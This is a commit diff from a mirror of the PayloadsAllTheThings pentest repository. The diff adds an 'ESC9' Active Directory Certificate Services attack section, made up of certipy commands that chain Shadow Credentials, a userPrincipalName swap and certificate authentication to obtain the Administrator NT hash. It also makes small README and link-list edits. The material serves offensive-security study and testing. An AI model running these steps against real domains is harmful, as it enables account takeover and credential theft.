mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
ESC9 - No Security Extension
This commit is contained in:
parent
b1c46228c2
commit
811863501b
1401
Insecure Source Code Management/Files/github-dorks.txt
Normal file
1401
Insecure Source Code Management/Files/github-dorks.txt
Normal file
File diff suppressed because it is too large
Load Diff
@ -81,6 +81,7 @@
|
||||
- [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
|
||||
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
||||
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
||||
- [ESC9 - No Security Extension](#esc9---no-security-extension)
|
||||
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
||||
- [Pass-The-Certificate](#pass-the-certificate)
|
||||
- [UnPAC The Hash](#unpac-the-hash)
|
||||
@ -257,6 +258,8 @@ Use the correct collector
|
||||
* Collect more data for certificates exploitation using Certipy
|
||||
```ps1
|
||||
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound
|
||||
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound
|
||||
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123
|
||||
```
|
||||
|
||||
Then import the zip/json files into the Neo4J database and query them.
|
||||
@ -2459,6 +2462,45 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||
certipy relay -ca 172.16.19.100
|
||||
```
|
||||
|
||||
|
||||
#### ESC9 - No Security Extension
|
||||
|
||||
Requirements:
|
||||
* `StrongCertificateBindingEnforcement` set to `1` (default) or `0`
|
||||
* Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value
|
||||
* Certificate specifies `Any Client` authentication EKU
|
||||
* `GenericWrite` over any account A to compromise any account B
|
||||
|
||||
**Scenario**
|
||||
|
||||
John@corp.local has **GenericWrite** over Jane@corp.local, and we want to compromise Administrator@corp.local.
|
||||
Jane@corp.local is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value.
|
||||
|
||||
* Obtain the hash of Jane with Shadow Credentials (using our GenericWrite)
|
||||
```ps1
|
||||
certipy shadow auto -username John@corp.local -p Passw0rd -account Jane
|
||||
```
|
||||
* Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part
|
||||
```ps1
|
||||
certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator
|
||||
```
|
||||
* Request the vulnerable certificate template ESC9 from Jane's account.
|
||||
```ps1
|
||||
certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9
|
||||
# userPrincipalName in the certificate is Administrator
|
||||
# the issued certificate contains no "object SID"
|
||||
```
|
||||
* Restore userPrincipalName of Jane to Jane@corp.local.
|
||||
```ps1
|
||||
certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local
|
||||
```
|
||||
* Authenticate with the certificate and receive the NT hash of the Administrator@corp.local user.
|
||||
```ps1
|
||||
certipy auth -pfx administrator.pfx -domain corp.local
|
||||
# Add -domain <domain> to your command line since there is no domain specified in the certificate.
|
||||
```
|
||||
|
||||
|
||||
#### Certifried CVE-2022-26923
|
||||
|
||||
> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.
|
||||
|
@ -1504,3 +1504,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
|
||||
* [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1)
|
||||
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
|
||||
* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
|
||||
* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)
|
17
README.md
17
README.md
@ -1,11 +1,15 @@
|
||||
# Payloads All The Things [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)
|
||||
# Payloads All The Things
|
||||
|
||||
A list of useful payloads and bypasses for Web Application Security.
|
||||
Feel free to improve with your payloads and techniques !
|
||||
I :heart: pull requests :)
|
||||
|
||||
You can also contribute with a :beers: IRL, or using the sponsor button.
|
||||
You can also contribute with a :beers: IRL, or using the sponsor button
|
||||
|
||||
[![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo)
|
||||
[![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)
|
||||
|
||||
An alternative display version is available at https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/.
|
||||
|
||||
<p align="center">
|
||||
<img src="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/.github/banner.png">
|
||||
@ -59,3 +63,12 @@ Be sure to read [CONTRIBUTING.md](https://github.com/swisskyrepo/PayloadsAllTheT
|
||||
</p>
|
||||
|
||||
Thanks again for your contribution! :heart:
|
||||
|
||||
|
||||
🧙♂️ Sponsors
|
||||
-----
|
||||
|
||||
This project is proudly sponsored by these companies.
|
||||
|
||||
[<img src="https://avatars.githubusercontent.com/u/48131541?s=40&v=4">](https://github.com/vaadata)
|
||||
[<img src="https://avatars.githubusercontent.com/u/50994705?s=40&v=4">](https://github.com/projectdiscovery)
|
||||
|
@ -11,7 +11,6 @@
|
||||
- [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg)
|
||||
- [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained)
|
||||
- [STÖK](https://www.youtube.com/c/STOKfredrik)
|
||||
- [Defcon](https://www.youtube.com/user/DEFCONConference)
|
||||
- [Hackersploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q)
|
||||
- [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)
|
||||
- [Nahamsec](https://www.youtube.com/c/Nahamsec)
|
||||
@ -26,4 +25,7 @@
|
||||
- [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
|
||||
- [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
|
||||
- [The Conscience of a Hacker](https://www.youtube.com/watch?v=0tEnnvZbYek)
|
||||
- [Defcon 2020 Talks](https://www.youtube.com/user/DEFCONConference/videos)
|
||||
- [Defcon Conference](https://www.youtube.com/user/DEFCONConference/videos)
|
||||
- [x33fcon Conference](https://www.youtube.com/c/x33fcon)
|
||||
- [Hack In Paris](https://www.youtube.com/user/hackinparis)
|
||||
- [LeHack / HZV](https://www.youtube.com/user/hzvprod)
|
Loading…
Reference in New Issue
Block a user